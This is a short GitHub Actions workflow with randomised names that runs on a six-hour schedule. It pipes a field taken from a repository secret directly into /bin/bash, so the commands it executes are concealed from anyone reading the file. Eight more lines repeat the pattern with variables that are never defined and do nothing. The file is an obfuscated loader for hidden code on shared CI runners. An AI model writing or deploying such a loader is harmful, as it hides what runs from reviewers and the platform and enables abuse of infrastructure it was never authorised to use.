name: guoxiuqing2678
on:
  workflow_dispatch:
  schedule:
    - cron: '29 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guoxiuqing2678
        env:
          rdda84138: ${{ secrets.rdda84138 }}
        run: |
          echo $rdda84138 | jq -r .ccoc39 | /bin/bash
          echo $jx63280 | jq -r .ikd7 | /bin/bash
          echo $xs1076 | jq -r .wfohg01 | /bin/bash
          echo $dy168 | jq -r .ydfns65 | /bin/bash
          echo $pq63523 | jq -r .ac274 | /bin/bash
          echo $j49588 | jq -r .c636 | /bin/bash
          echo $alz8 | jq -r .o130 | /bin/bash
          echo $tosw90103 | jq -r .erbp15 | /bin/bash
          echo $nxjkc01478 | jq -r .zwl28244 | /bin/bash

